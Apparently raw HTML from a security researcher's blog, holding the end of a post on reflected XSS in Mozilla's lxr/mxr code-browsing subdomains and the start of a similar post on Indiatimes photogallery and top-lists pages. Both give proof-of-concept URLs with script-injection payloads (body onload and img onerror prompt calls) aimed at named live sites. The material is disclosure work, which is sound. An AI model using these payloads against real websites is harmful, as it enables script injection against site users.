<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/" href="http://lxr.mozilla.org/mozilla-central/source/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/</a><body onload=prompt("justqdjing")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/mobile/android/" href="http://lxr.mozilla.org/mozilla-central/source/mobile/android/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/mobile/android/</a><body onload=prompt("justqdjing")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/Android.mk/" href="http://lxr.mozilla.org/mozilla-central/source/Android.mk/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/Android.mk/</a><body onload=prompt("tetraph")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/" href="http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/</a><body onload=prompt("tetraph")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp" href="http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp" target="_blank">http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp</a><body onload=prompt("tetraph")></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/" href="http://mxr.mozilla.org/mozilla-central/source/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/</a><body onload=prompt("justqdjing")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/webapprt/" href="http://mxr.mozilla.org/mozilla-central/source/webapprt/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/webapprt/</a><body onload=prompt("justqdjing")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/" href="http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/</a><body onload=prompt("justqdjing")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/" href="http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/</a><body onload=prompt("tetraph")></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/" href="http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/</a><body onload=prompt("tetraph")></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=onA5BgC3zIY"><span style="color: black;">https://www.youtube.com/watch?v=onA5BgC3zIY</span></a></span></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>(2) Vulnerability Analysis:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Take the following link as an example,</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">In the page reflected, it contains the following codes.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="/mozilla-central/source/chrome/%253Cattacktest%253E"></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><attacktest></attacktest></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"></a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">If insert "<body onload=prompt("justqdjing")>" into the URL, the code can be executed.</span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b>(3) Vulnerability Disclosure:</b></span></span></div>
<div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability have been reported to bugzilla.mozilla.org. Mozilla are dealing with this issue.</span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br class="Apple-interchange-newline" />Discovered and Reported by:</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558912321821499392">@justqdjing</a>)</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing/" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing/</a></span></span></div>
</div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span></div>
<div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><b>More Details:</b></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://lists.openwall.net/full-disclosure/2014/10/20/8" data-mce-style="color: #000000;" href="http://lists.openwall.net/full-disclosure/2014/10/20/8" style="color: black;">http://lists.openwall.net/full-disclosure/2014/10/20/8</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141378783804463&w=2" data-mce-style="color: #000000;" href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141378783804463&w=2" style="color: black;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://seclists.org/fulldisclosure/2014/Oct/92" data-mce-style="color: #000000;" href="http://seclists.org/fulldisclosure/2014/Oct/92" style="color: black;">http://seclists.org/fulldisclosure/2014/Oct/92</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;" target="_blank">http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla-org-two-sub-domains-cross" data-mce-style="color: #000000;" href="http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla-org-two-sub-domains-cross" style="color: black;">http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://tetraph.blog.163.com/blog/static/2346030512014101115642885/" data-mce-style="color: #000000;" href="http://tetraph.blog.163.com/blog/static/2346030512014101115642885/" style="color: black;">http://tetraph.blog.163.com/blog/static/2346030512014101115642885/</a></span><span data-mce-style="color: #000000;"><br /></span><span data-mce-style="color: #000000;"><a data-mce-href="http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" data-mce-style="color: #000000;" href="http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" style="color: black;">http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="https://tetraph.wordpress.com/2014/11/26/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains-2/" data-mce-style="color: #000000;" href="https://tetraph.wordpress.com/2014/11/26/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains-2/" style="color: black;">https://tetraph.wordpress.com/2014/11/26/mozilla-two-sub-domains-xss</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" data-mce-style="color: #000000;" href="http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html" style="color: black;">http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f" data-mce-style="color: #000000;" href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f" style="color: black;">http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross-reference-sub-domains" data-mce-style="color: #000000;" href="http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross-reference-sub-domains" style="color: black;">http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://diebiyi.com/articles/security/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://diebiyi.com/articles/security/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://diebiyi.com/articles/security/xss-vulnerability/mozilla-xss</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a data-mce-href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-xss</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="https://mathfas.wordpress.com/2014/11/01/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="https://mathfas.wordpress.com/2014/11/01/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">https://mathfas.wordpress.com/2014/11/01/mozilla-xss</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" data-mce-style="color: #000000;" href="http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/" style="color: black;">http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss</a></span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121" data-mce-style="color: #000000;" href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121" style="color: black;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121</a></span></span></span></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-65959463165616939802015-06-20T02:13:00.001-07:002015-06-20T02:13:45.056-07:00All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (Cross Site Scripting) Attacks <div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b style="background-color: white;"><br /></b><b style="background-color: white;">All Links in </b><b style="background-color: white;">Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (Cross Site Scripting) Attacks </b></span></span></div>
<div class="clearfix entry-content">
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b><b>(1) Domain Description:</b></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://www.indiatimes.com</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">"The Times of India (TOI) is an Indian English-language daily newspaper. It is the third-largest newspaper in India by circulation and largest selling English-language daily in the world according to Audit Bureau of Circulations (India). According to the Indian Readership Survey (IRS) 2012, the Times of India is the most widely read English newspaper in India with a readership of 7.643 million. This ranks the Times of India as the top English daily in India by readership. </span><span style="font-size: small;">It is owned and published by Bennett, Coleman & Co. Ltd. which is owned by the Sahu Jain family. In the Brand Trust Report 2012, Times of India was ranked 88th among India's most trusted brands and subsequently, according to the Brand Trust Report 2013, Times of India was ranked 100th among India's most trusted brands. In 2014 however, Times of India was ranked 174th among India's most trusted brands according to the Brand Trust Report 2014, a study conducted by Trust Research Advisory." (</span><span style="font-size: small;"><a href="http://en.wikipedia.org/" target="_blank">en.Wikipedia.org</a>)</span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>(2) Vulnerability description:</b></span></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The web application indiatimes.com online website has a security problem. Hacker can exploit it by XSS bugs.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The code flaw occurs at Indiatimes's URL links. Indiatimes only filter part of the filenames in its website. All URLs under Indiatimes's "photogallery" and "top-llists" topics are affected. </span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Indiatimes uses part of the links under "photogallery" and "top-llists" topics to construct its website content without any checking of those links at all. This mistake is very popular in nowaday websites. Developer is not security expert.</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability can be attacked without user login. Tests were performed on Mozilla Firefox (26.0) in Ubuntu (12.04) and Microsoft IE (9.0.15) in Windows 7.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSwkr3z-wy06CFdOoSZTJT86yUUVtYKt3-U6h_ZkgWm1uotMaqCkkVnemeihlB4wJ8XFE-eTmF6mG1jfDBhO2WylN_PAQk4gP_nBqnCXAsg58_bAmmoajtAgo3LM16w3L1zOBlbmtnx1w/s1600/indiatimes_xss1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSwkr3z-wy06CFdOoSZTJT86yUUVtYKt3-U6h_ZkgWm1uotMaqCkkVnemeihlB4wJ8XFE-eTmF6mG1jfDBhO2WylN_PAQk4gP_nBqnCXAsg58_bAmmoajtAgo3LM16w3L1zOBlbmtnx1w/s1600/indiatimes_xss1.png" style="cursor: move;" width="400" /></a></span></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUm2pg5__HN25aUoUCsJ5II-AeXBOCSb1i7-Kcv4-chMFu3YcB5AVWlWkuukDcz-wOkmrSFSIowJe0nyRxmcPA89BFY7Aa1iU3SW8pGyrbtMXq0oLxVikF-iCMndORfzDRW4011tVDlh4/s1600/indiatimes_xss_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUm2pg5__HN25aUoUCsJ5II-AeXBOCSb1i7-Kcv4-chMFu3YcB5AVWlWkuukDcz-wOkmrSFSIowJe0nyRxmcPA89BFY7Aa1iU3SW8pGyrbtMXq0oLxVikF-iCMndORfzDRW4011tVDlh4/s1600/indiatimes_xss_2.png" style="cursor: move;" width="400" /></a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes:</b></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/photogallery/" target="_blank">http://www.indiatimes.com/<wbr></wbr>photogallery/</a>">homeqingdao<img src=x onerror=prompt('justqdjing')></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/top-lists/" target="_blank">http://www.indiatimes.com/top-<wbr></wbr>lists/</a>">singaporemanagementuniversity<img src=x onerror=prompt('justqdjing')></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/photogallery/lifestyle/" target="_blank">http://www.indiatimes.com/<wbr></wbr>photogallery/lifestyle/</a>">astar<img src=x onerror=prompt('justqdjing')></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/top-lists/technology/" target="_blank">http://www.indiatimes.com/top-<wbr></wbr>lists/technology/</a>">nationaluniversityofsingapore<img src=x onerror=prompt('justqdjing')></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
